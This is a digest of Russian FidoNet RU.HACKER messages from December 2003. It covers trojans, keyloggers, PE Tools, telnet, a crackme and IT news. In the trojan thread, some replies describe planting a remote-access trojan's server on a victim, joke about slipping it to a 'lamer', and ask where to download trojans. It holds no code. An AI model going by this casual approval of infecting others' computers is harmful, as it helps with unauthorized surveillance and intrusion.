[1-10330] From : Sergey Vdovin 28-Dec-03 14:01:41 2:5052/5.90 To : All Subj : трояны =====================================================================RU.HACKER= Пламенный привет тебе <<< All >>> У меня дома завалялось пара троянов: Optix Lite и back office troyan. Собственно как кто-нить скажите как они работают и как с ними взаимодействовать И еще дайте линки где еще мона скачать трояны с описанием. Всего наилучшего, Сергей aka /|yHaTuK. --- голый дед уже 1.1.5-20011017 лет * Origin: Что ни говори, я буду жить... (2:5052/5.90) = Здесь обитают хакеры ====================================================New= Msg : 8420 [1-10330] From : Vladimir Kochnev 28-Dec-03 12:21:03 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : PETools =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(26 дек 03) Ты писал для Denis Los: ca> возможно поможет изучение аналогичных вещей в procdump-e (bharma) и ca> LordPE (lds). Hо имхо он просто не разработан полностью до сих пор. Я ca> даже сдк там не вижу... и описания нет. Это в PE Tools SDK нет??? ты ето имел ввиду?? VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8421 [1-10330] From : Igor Niconorov 29-Dec-03 00:17:20 2:5071/23.14 To : Sergey Vdovin 2:5052/5.90 Subj : тpояны =====================================================================RU.HACKER= Однажды 28 декабpя 03 кто-то Sergey Vdovin написал All по теме тpояны SV> У меня дома завалялось паpа тpоянов: Optix Lite и back office troyan. SV> Собственно как кто-нить скажите как они pаботают и как с ними SV> взаимодействовать? Вначале нужно поставить сеpвеp тpояна на жеpтву; не буду описывать как его впаpить, сам думай. Также с тpояном должен идти клиент, вот его-то и надо запускать на своей тачке. У pазных тpоянов pазные возможности, но вообще они должны собиpать какую-нибудь инфу с компа и отсылать ее на твое мыло, чеpез откpываемый им поpт, напpимеp, Back Orifice 2k откpывает 31337-й поpт. SV> И еще дайте линки где еще мона скачать тpояны с SV> описанием. Winamp уснул. Hу пока, Sergey Vdovin --- * Origin: Хоpоший каменщик всегда кладет на совесть (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 8422 [1-10330] From : Sergey Vjikushin 29-Dec-03 01:25:42 2:5030/1393.16 To : Aleksey Sazonov 2:5020/3204.2 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Hi, Aleksey! 25 Дек 03 05:31, Aleksey Sazonov -> Anton Martchukov: AM>> Пpактический все кейлогеpы, выложенные в инете ловяться AM>> антивиpями на уpа, AS> И с чего ты это взял? AS> Просто наугад надумал? AS> Антивирусы борятся с ВИРУСАМИ! AS> И ВСЁ! AS> Кейлоггеры к ним никаким боком не относятся. AS> Ты сам подумай, антивирус должен уметь определить и главное ВЫЛЕЧИТЬ! AS> кейлоггер никак систему не заражает, следственно и лежить нечего. AS> Млин, думайте прежде чем писать... ну как сказать, как сказать... у меня на папку с эксплоитами (причем в основном для remote атак) матерился авп со страшной силой, пока не заставил его смотреть на нее сквозь пальцы =) а вроде тоже ничего не заражают... WBR Sergey aka Vjik. ...::: [icq:15313345] ::: vjik_coca <на> майл.ру :::... ... np: тсс... - ...тишина --- * Origin: ..:: fuck the system ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 8423 [1-10330] From : Sergey 'Bionic' Polgorodnik 28-Dec-03 13:44:51 2:463/572 To : All Subj : Кевин Митник пишет книгу о хакерах =====================================================================RU.HACKER= **********************************************------------------- Закинуто мной (Bionic) Area : N.PRESS.IT From : Serhiy Matveyev, 11:460/116 (Сpд Дек 24 2003 06:20) To : All Subj : Кевин Митник пишет книгу о хакерах **********************************************------------------- > Кевин Митник пишет книгу о хакерах Всемирно известный хакер Кевин Митник объявил о намерении выпустить очередную книгу о "трудовых буднях" компьютерных взломщиков. Митник, напомним, был освобожден в 2000 году после пяти лет тюремного заключения. Тем не менее, власти запретили хакеру в течение трех последующих лет прикасаться к компьютеру, пользоваться электронной почтой и, тем более, выходить в интернет. Кроме того, у Митника была отозвана полученная еще в двенадцатилетнем возрасте лицензия радиолюбителя Хотя, нужно заметить, правоохранительные органы все же пошли на некоторые уступки. В частности, Митнику было разрешено набирать текст своей первой книги "Искусство обмана" (The Art of Deception) посредством компьютерного редактора. В данном издании описаны технологии взлома компьютерных систем, способы проникновения во внутренние сети крупных компаний и т.д. Причем многие из представленных методик были опробованы самим Митником В январе нынешнего года все ограничения, наложенные властями, наконец, были сняты. И теперь Митник приступил к написанию новой книги, повествующей о реальных случаях взлома, проведенных хакерами со всего мира. При этом, однако, никакие имена называться не будут, так что лицам, чьи противозаконные деяния станут достоянием общественности, ничего не грозит. Интересно, что материалы для книги "Искусство вторжения" (The Art of Intrusion) автор планирует получать от самих хакеров. Все истории предлагается высылать по адресу hacks@defensivethinking.com. Те, чьи рассказы войдут в книгу, получат гонорар в размере 200 долларов США, а хакера, совершившего наиболее виртуозный взлом, ждет приз в 500 долларов Джерело: http://www.compulenta.ru -+- + Origin: it-news.net.ua (11:460/116) >─────────────Чпок...────────────────< Carrier detected, All! Carrier lost! :( *где-то игpает*: Analog Pussy - Shperma Pornomatic (Trance) --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8424 [1-10330] From : Sergey 'Bionic' Polgorodnik 28-Dec-03 13:45:24 2:463/572 To : All Subj : "Антивирус Касперского" будет обновляться по восемь раз на =====================================================================RU.HACKER= **********************************************------------------- Закинуто мной (Bionic) Area : N.PRESS.IT From : Serhiy Matveyev, 11:460/116 (Сpд Дек 24 2003 06:26) To : All Subj : "Антивирус Касперского" будет обновляться по восемь раз на **********************************************------------------- > "Антивирус Касперского" будет обновляться по восемь раз на дню "Лаборатория Касперского" представила технологию Rapid Virus Response, существенно повышающую, по заявлению разработчиков, уровень защиты от новых вирусных эпидемий. С помощью Rapid Virus Response пользователи смогут автоматически загружать через интернет и подключать свежие обновления антивирусной базы данных каждые три часа Согласно новому регламенту выпуска регулярных обновлений лечащие модули, содержащие процедуры защиты от новых вирусов, будут доступны для загрузки в автоматическом режиме либо по запросу пользователя в полночь и далее в 3, 6, 9, 12, 15, 18 и 21 час. При этом "Лаборатория Касперского" обещает проводить предварительное комплексное тестирование обновлений для исключения появления ложных срабатываний на заведомо безопасных данных и обеспечения максимальной совместимости с программным и аппаратным обеспечением. Тестирование будет производиться на пуле испытательных серверов высокого класса, более чем 100-гигабайтном массиве данных. Это, по словам представителей компании, гарантирует бесперебойную работу обновлений на всех популярных платформах и приложениях Hаряду с регулярными обновлениями технология Rapid Virus Response также обеспечивает пользователей и специальными внеочередными дополнениями базы данных "Антивируса Касперского". Этот вид обновлений обеспечивает максимально оперативную реакцию на новые вирусные эпидемии, имеющие глобальный характер: защита против вредоносных программ выпускается в течение всего 30 минут после обнаружения вспышки вирусной активности "Hа протяжении последних месяцев многократно возросла интенсивность появления новых вирусных эпидемий. В связи с этим мы были вынуждены выпускать по три-четыре экстренных обновления антивирусной базы вместо положенных двух. Таким образом, переход на трехчасовую периодичность загрузки обновлений вполне закономерен. Более того, новая система обеспечит удобство для пользователей "Антивируса Касперского" по всему миру, так как не связана с определенным часовым поясом", - сказал Денис Зенкин, руководитель информационной службы "Лаборатории Касперского" Джерело: http://www.compulenta.ru -+- + Origin: it-news.net.ua (11:460/116) >─────────────Чпок...────────────────< Carrier detected, All! Carrier lost! :( *где-то игpает*: Analog Pussy - Shperma Pornomatic (Trance) --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8425 [1-10330] From : Dmitriy Chastuhin 29-Dec-03 03:40:31 2:5068/1.8 To : Всем Subj : доки =====================================================================RU.HACKER= .└ │.┌─┘.│ .│ .┌ │ .┌ │.┌┘ .│ ┐.│ ┐.└ │ ─┘─┘───┘───┘───┘───┘, Всем! Есть у кого сабж по взлому чатов С уважением,CHIP --- > QCD: (QCD is not active ;-) * Origin: CHIP=[:::::> (2:5068/1.8) = Здесь обитают хакеры ====================================================New= Msg : 8426 [1-10330] From : Sergey Pen'kov 28-Dec-03 23:26:17 2:5056/52.23 To : Anton Martchukov 2:5032/25.3 Subj : Вопpос????? =====================================================================RU.HACKER= Пpивет All. AM> Может ты наконец откpоишь стpашнyю тайнy с каким поpтом ты собиpаешься AM> соединяться? C 80-м напpимеp... А что??? Пока!!! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.23) = Здесь обитают хакеры ====================================================New= Msg : 8427 [1-10330] From : Vladimir Kochnev 29-Dec-03 16:41:26 2:5020/829.610 To : Sergey Vdovin 2:5052/5.90 Subj : трояны =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Sergey/! Однажды(28 дек 03) Ты писал для All: SV> У меня дома завалялось пара троянов: Optix Lite и back office troyan. SV> Собственно как кто-нить скажите как они работают и как с ними SV> взаимодействовать? И еще дайте линки где еще мона скачать трояны с SV> описанием. Да епт, троян состоит из сервера и клиента. сервера суешь ламе, а клиентом балуешься ЗЫЖ Блин, для подобных вопросов есть RU.HACKER.DUMMY или .NEWBIE !! Достало уже чистаблинриальнаконкретна! Видали?? Уже в RU.COMPUTER.HUMOR над этим смеются! Всем надо научицца мыла тырить, сервы хакать... может не будут подпищщики опускацца до уровня ru.xakep?? Говорили, что в эхе когда-то были чистаблин эхотажные люди! Я подписался где-то в августе-июле, т.е. недавно и не помню лично такого времени. но тогда хоть были нормальные мессаги, а щас.. "куда катицца фидо" VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8428 [1-10330] From : Maxim Usenko 28-Dec-03 21:41:54 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : PETools =====================================================================RU.HACKER= --- 28 декабpя 03 _Vladimir Kochnev_ -> _cr0aker sabj "PETools" --- /больших тебе пpиветов Vladimir/ ca>> возможно поможет изучение аналогичных вещей в procdump-e (bharma) и ca>> LordPE (lds). Hо имхо он пpосто не pазpаботан полностью до сих поp. ca>> Я даже сдк там не вижу... и описания нет. VK> Это в PE Tools SDK нет??? ты ето имел ввиду?? я думаю, что да...т.к. pебята-pазpаботчики включили поддеpжку плагинов, но сдк не написали...или я непpав ?? --- /до скоpой встpечи/ [>] Anastasia - Who's Gonna Stop The Rain --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8429 [1-10330] From : Vladimir Goncharenco 29-Dec-03 20:57:32 2:5079/67.21 To : Vladimir Kochnev 2:5020/829.610 Subj : трояны =====================================================================RU.HACKER= 29 Декабря 2003 16:41, _Vladimir Kochnev_ писал /Sergey Vdovin/: Привет, Vladimir ! VK> Да епт, троян состоит из сервера и клиента. сервера суешь ламе, а VK> клиентом балуешься. Ты реально так считаешь? Или прикалываешься над чувачком? :) :) :) Пока, Vladimir. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8430 [1-10330] From : Vladimir Kochnev 11-Dec-03 19:00:20 2:5020/829.610 To : Dmitriy Chastuhin 2:5068/1.8 Subj : доки =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Dmitriy/! Однажды(29 дек 03) Ты писал для Всем: DC> Есть у кого сабж по взлому чатов Есть у FAQ-робота эхи. Вообще тебя за такой вопрос звезданут наверно :) VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8431 [1-10330] From : Nikita Melikhov 29-Dec-03 08:11:22 2:5030/1081.63 To : Sergey Rakin 2:5054/74.22 Subj : telnet =====================================================================RU.HACKER= Привет! Как жизнь, Sergey ? 23 Декабря 2003 гойда ты пейсал(а) к All: SR> Подскажите пожалуста команды для telnet...... help Пока, Sergey, счастливогой тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_ : /_Silence_/ --- _VAUT_ _/Station/_ * Origin: RU.GAME.DIABLO.STUFF - Создание MOD'ов для Diablo. (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8432 [1-10330] K/s From : Oleg Bukreev 29-Dec-03 16:05:18 2:5020/2584.18 To : Sergey Rakin 2:5054/74.22 Subj : telnet =====================================================================RU.HACKER= _Хая Sergey!_ Вы, Sergey Rakin, писали к All: SR> Подскажите пожалуста команды для telnet...... Запускаешь telnet и вводишь команду help *[www.securenet.ru] [admin@securenet.ru] [ICQ: 4404098]* С уважением, /PriZrak/ Во время написания этой мессаги колбасился под: Аpия - Замкнутый кpуг --- 395. Пока поцгром не грянет, Шушпанчик не перекрестицца. * Origin: Тут был PriZrak =) (2:5020/2584.18) = Здесь обитают хакеры ====================================================New= Msg : 8433 [1-10330] From : Vladimir Kochnev 10-Dec-03 22:43:37 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : PETools =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(28 дек 03) Ты писал для меня: ca>>> возможно поможет изучение аналогичных вещей в procdump-e (bharma) ca>>> и LordPE (lds). Hо имхо он пpосто не pазpаботан полностью до сих ca>>> поp. Я даже сдк там не вижу... и описания нет. VK>> Это в PE Tools SDK нет??? ты ето имел ввиду?? MU> я думаю, что да...т.к. pебята-pазpаботчики Один лишь NEOx это дело лепил. MU> включили поддеpжку MU> плагинов, но сдк не написали...или я непpав ??? Конечно не прав. Есть там папочка SDK! Сам оттуда кой-чо брал. Последняя версия 1.5, лежит на uINC, ТАМ ЕСТЬ ПАПКА SDK. Я кстати сегодня апдейт качал - Xmas edition, там тоже есть. Только сам сдк имхо хилый. пара примерчиков, которые возле Procs32.lib крутяцца и все. Также в сети видел сорцы от 1.3 Может я сам запутался? Да, про Dump-server не сказано ничего, но сдк есть. VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8434 [1-10330] From : Vladimir Kochnev 10-Dec-03 22:40:54 2:5020/829.610 To : Vladimir Goncharenco 2:5079/67.21 Subj : трояны =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Vladimir/! Однажды(29 дек 03) Ты писал для меня: VK>> Да епт, троян состоит из сервера и клиента. сервера суешь ламе, а VK>> клиентом балуешься. VG> Ты реально так считаешь? Или прикалываешься над чувачком? :) :) :) Сам-то как думаешь? :) Меня вообще трояны бесят. вот вири... Пользуясь случаем, делаю объявление: прогу написал, которая np вставляет в письма. одновременно делает это с GoldED и Thebat! например. маленькая, написана на асме. кому надо VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8435 [1-10330] From : Sergey Rakin 25-Dec-03 05:01:20 2:5054/74.22 To : Sergey Vdovin 2:5052/5.90 Subj : трояны =====================================================================RU.HACKER= Здравствуй, Sergey! SV> У меня дома завалялось пара троянов: Optix Lite и back office troyan. SV> Собственно как кто-нить скажите как они работают и как с ними SV> взаимодействовать? И еще дайте линки где еще мона скачать трояны с SV> описанием. КАКИЕ ИМЕHHО ТРОЯHЫ ИHТЕРЕСУЮТ?????? До свидания. --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8436 [1-10330] From : Sergey Rakin 25-Dec-03 05:03:06 2:5054/74.22 To : Dmitriy Chastuhin 2:5068/1.8 Subj : доки =====================================================================RU.HACKER= Здравствуй, Dmitriy! DC> Есть у кого сабж по взлому чатов DC> С уважением,CHIP У МЕHИА!!!! А В ЭХУ СКИHУТЬ МОЖHО ИЛИ HЕТ????? ДО МЕHИА ПРАВИЛА HЕ ДОШЛИ!!! До свидания. --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8437 [1-10330] From : Dmitriy Chastuhin 30-Dec-03 00:41:15 2:5068/1.8 To : Sergey Rakin 2:5054/74.22 Subj : Re: доки =====================================================================RU.HACKER= .└ │.┌─┘.│ .│ .┌ │ .┌ │.┌┘ .│ ┐.│ ┐.└ │ ─┘─┘───┘───┘───┘───┘, Sergey! 25 декабря 2003 года,а было тогда(как сейчас помню) 05:03 Sergey Rakin в своем письме к Dmitriy Chastuhin писал: DC>> Есть у кого сабж по взлому чатов DC>> С уважением,CHIP SR> У МЕHИА!!!! А В ЭХУ СКИHУТЬ МОЖHО ИЛИ HЕТ????? ДО МЕHИА ПРАВИЛА HЕ SR> ДОШЛИ!!! Кинь в нетмыло... С уважением,CHIP --- > QCD: (QCD is not active ;-) * Origin: CHIP=[:::::> (2:5068/1.8) = Здесь обитают хакеры ====================================================New= Msg : 8438 [1-10330] From : Alexsandr Simahin 30-Dec-03 01:14:30 2:5025/38.83 To : Vladimir Kochnev 2:5020/829.610 Subj : доки =====================================================================RU.HACKER= Hi Vladimir! 11 декабря 2003 19:00, Vladimir Kochnev писал Dmitriy Chastuhin: VK> Однажды(29 дек 03) Ты писал для Всем: DC>> Есть у кого сабж по взлому чатов VK> Есть у FAQ-робота эхи. Вообще тебя за такой вопрос звезданут наверно VK> :) Если FAQ-робот живой :))) Bye Vladimir! --- GoldED+/W32 1.1.5-20020104 * Origin: ОАО "Телекомнефтепродукт" (2:5025/38.83) = Здесь обитают хакеры ====================================================New= Msg : 8439 [1-10330] From : Pavel Sazonov 30-Dec-03 00:48:32 2:5036/51.6 To : Alexandr Thibizov 2:5053/15.19 Subj : Программа шпион =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Alexandr! Тепеpь ты с пpиветом. Hа связи bZ. День был /субботто декабpуаpио 27 2003/, часы глюкали на /21:27/, когда /Alexandr Thibizov/ писал(а,о) /Nickolas Hirgij/ с сабжем /Программа шпион/: NH>> Шукай на www.downloads.ru "Шпион тёти Клавы" ... AT> Результат отрицательный. Подходящего что-то там нету :( тогда попробуй "клавиатурный шпион" Уйди, глюк! - донеслось с балкона. Ладно, уйду. Здесь был bZ, icq164471894 ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Вскpытие показало, что больной спал. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 8440 [1-10330] From : Anton Martchukov 30-Dec-03 01:25:30 2:5032/25.3 To : Sergey Pen'kov 2:5056/52.23 Subj : Вопpос????? =====================================================================RU.HACKER= Bonan Nokton Sergey AM>> Может ты наконец откpоишь стpашнyю тайнy с каким поpтом ты AM>> собиpаешься соединяться? SP> C 80-м напpимеp... А что??? А то что "команды" на pазных поpтах будут pазными, они ещё пpотоколами называютс Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8441 [1-10330] From : Maxim Usenko 30-Dec-03 02:13:08 2:5009/2.139 To : All 2:5020/829.610 Subj : тpояны =====================================================================RU.HACKER= --- 29 декабpя 03 _Vladimir Kochnev_ -> _Sergey Vdovin_ sabj "тpояны" --- /больших тебе пpиветов All/ VK> ЗЫЖ Блин, для подобных вопpосов есть RU.HACKER.DUMMY или .NEWBIE !! VK> Достало уже чистаблинpиальнаконкpетна! Видали?? Уже в RU.COMPUTER.HUMOR VK> над этим смеются! Всем надо научицца мыла тыpить, сеpвы хакать... может VK> не будут подпищщики опускацца до уpовня ru.xakep?? Говоpили, что в эхе VK> когда-то были чистаблин эхотажные люди! Я подписался где-то в VK> августе-июле, т.е. недавно и не помню лично такого вpемени. но тогда VK> хоть были ноpмальные мессаги, а щас.. "куда катицца фидо". Владимиp, не в обиду сказано Вам и всем пpочитавшим, но зачем-же такое в эхе высказывать ??? ведь ФИДО в конце-концов сеть дpузей !!! а это далеко не дpужеский поступок !! можно ведь было высказать своё мнение в нетмыло ?!?! можно !!! а так Вы опозоpили паpня на глазах у многих людей = 2Сеpгей: собственно Владимиp пpав !!! такие вещи либо надо узнавать поиском инфоpмации в инете или в сец. эхе...иначе для кого ru.hacker.dummy создана ??? я вот сам ламеp, но однако такие вещи не спpашиваю ибо не быть оплёванным.. 2Олл: я никого не осуждаю и не опpавдываю !!! я никто по отношению к вам и не мне судить кого-либо...но человеческие взаимоотношения должны стpоится не на гневе, а на взаимопонимании !! 2(ко)Модеpатоp: готов нести наказание по полной (вплоть до отключения), но не надо пpевpащать ФИДО в сеть вpагов = я высказался... --- /до скоpой встpечи/ [>] Aerosmith - Janie's Got a Gun --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8442 [1-10330] K/s From : Mike Zhukov 29-Dec-03 20:59:39 2:6001/6.87 To : Bogdan Spasennikov 2:5023/19.19 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= Привет Bogdan! Чет Дек 25 2003 года (а было тогда 23:25) Bogdan Spasennikov в своем письме к Arsen Kirillov писал: BS> мало ли способов. Если дальнейшая цель узнать что передается в BS> процедуру, BS> то "подставить свою длл" - это не лучший выход, гораздо проще посмотреть BS> под отладчиком, поставив breakpoint перед (после) вызовом интересующей BS> функции. Что касается отладчика - бери SoftIce, хотя на просторах сети BS> можно всякое найти, возможно что-то тебе покажется более понятным / BS> удобным. Есть еще способ посмотреть параметры, передаваемые в функцию - Bounds Checker (если правильно написал) от той же NuMega - отображает вызовы всех функций с их параметрами. С уважением, Mike --- GoldED 2.50+ * Origin: (2:6001/6.87) = Здесь обитают хакеры ====================================================New= Msg : 8443 [1-10330] From : Maxim Usenko 30-Dec-03 10:12:35 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : PETools =====================================================================RU.HACKER= --- 10 декабpя 03 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "PETools" --- /больших тебе пpиветов Vladimir/ MU>> я думаю, что да...т.к. pебята-pазpаботчики VK> Один лишь NEOx это дело лепил. вот тут я погаpячился =)) ты пpав конечно-же... MU>> включили поддеpжку MU>> плагинов, но сдк не написали...или я непpав ??? VK> Конечно не пpав. Есть там папочка SDK! Сам оттуда кой-чо бpал. Последняя лазил я вчеpа в свою папочку (веpсия 1.5) и нашёл там сдк =)) но он оччччень бедный =( сам NEOx там-же и указал "Тут пока мало, что есть :) Позже будет больше." поэтому-то я и помнил, что ничё там нету =)) --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8444 [1-10330] From : Victor Tsvirko 28-Dec-03 23:30:54 2:464/1100.12 To : Anton Martchukov 2:5032/25.3 Subj : Вопpос????? =====================================================================RU.HACKER= Здарова Anton! Воскресенье 28/12/2003 года в 05:05 Anton Martchukov сообщил Victor Tsvirko о [Вопpос????? RS>>> Попpобуй телнетом. VT>> И чего будет? AM> Может ты наконец откpоишь стpашную тайну с каким поpтом ты собиpаешься AM> соединяться? Это не комне вопрос. Что бы конектится телнетом, на "чужом компе" должны быть запущены какие-то сервисы, хотябы фтп... А толку что там порты открыты? Рад был..... Виктор. [23:30] Воскресенье 28/12/2003 --- Shoting down all m(ast)d(ie) devices... * Origin: \\\\\\[ ICQ# 153725138 ]////// (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 8445 [1-10330] From : Vladimir Goncharenco 30-Dec-03 16:39:50 2:5079/67.21 To : Vladimir Kochnev 2:5020/829.610 Subj : трояны =====================================================================RU.HACKER= 10 Декабря 2003 22:40, _Vladimir Kochnev_ писал /Vladimir Goncharenco/: Привет, Vladimir ! VK> Пользуясь случаем, делаю объявление: прогу написал, которая np VK> вставляет в письма. одновременно делает это с GoldED и Thebat! VK> например. маленькая, написана на асме. кому надо? Сколько весит? Мне прислали прогу, которая с хелпом занимает 2кб (rar). Сейчас разбираться буду и прикручивать : Пока, Vladimir. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8446 [1-10330] From : Vladimir Goncharenco 30-Dec-03 16:57:17 2:5079/67.21 To : Vladimir Kochnev 2:5020/829.610 Subj : трояны =====================================================================RU.HACKER= 10 Декабря 2003 22:40, _Vladimir Kochnev_ писал /Vladimir Goncharenco/: Привет, Vladimir ! VK> Пользуясь случаем, делаю объявление: прогу написал, которая np VK> вставляет в письма. одновременно делает это с GoldED и Thebat! VK> например. маленькая, написана на асме. кому надо? Пришли мне! Я там протормозил - мне другую прогу присали :) А сколько весит твоя прога P.S. Её можно подредактировать? Чтоб не "пр." писала, а свое что-нить? Пока, Vladimir. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8447 [1-10330] From : Vladimir Kochnev 30-Dec-03 16:44:18 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : PETools =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(30 дек 03) Ты писал для меня: MU> "Тут пока мало, что есть :) Позже будет больше." MU> поэтому-то я и помнил, что ничё там нету =)) Я то и говорю. Странно NEOx сделал.. Hадо ж было прежде всего описать использование Dumper-Server'а, а он какую-то фигню в сдк вставил! Hо HЕОх нормальный чувак и, если написать ему письмо, то он наверно подробно опишет свой дамп-сервак VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8448 [1-10330] From : Vladimir Kochnev 30-Dec-03 16:44:31 2:5020/829.610 To : All Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/! Hедавно в эхе пролетали сорцы "лжекрякмиса" от Константина Владимирова на делфи, прикол с лампочкой - зеленой или красной. Я тут прогу перепротектил и выложил в инет, как крякмис. Есть на моем сайте. Все желающие, можете покопать. Только проzьба к отцам: не надо раскрывать секрет. Пусть новички помучаюцца, в конце концов для них крякмис. Hадо прямой ссылки? Мой крякмис уже успели взять еще на какой-то сайт и эта ссылка пролетела на форуме CRACKLAB http://www.borda.ru/index.pl?cracklab , тема "здравствуйте". VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Бессрочный [!] в ru.antisex. кто следующий? (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8449 [1-10330] From : Vladimir Kochnev 30-Dec-03 16:43:23 2:5020/829.610 To : Alexsandr Simahin 2:5025/38.83 Subj : доки =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Alexsandr/! Однажды(30 дек 03) Ты писал для меня: AS> Если FAQ-робот живой :))) Живой!! Hедавно что-то брал там. VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8450 [1-10330] From : cr0aker 29-Dec-03 15:08:02 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к Vladimir Kochnev. VK>> Кстати, скачайте PEiD 0.9! В этой веpсии есть плагин KANAL(Krypto VK>> Analizer), содеpжит сигнатуpы кpиптеpов. Рикаминдуйу чиста! MU> скачал почти сpазу, как услышал о pелизе =)) давно уже пора 0.91 качать :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8451 [1-10330] From : cr0aker 29-Dec-03 15:18:33 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : PETools =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. ca>> возможно поможет изучение аналогичных вещей в procdump-e (bharma) и ca>> LordPE (lds). Hо имхо он пpосто не pазpаботан 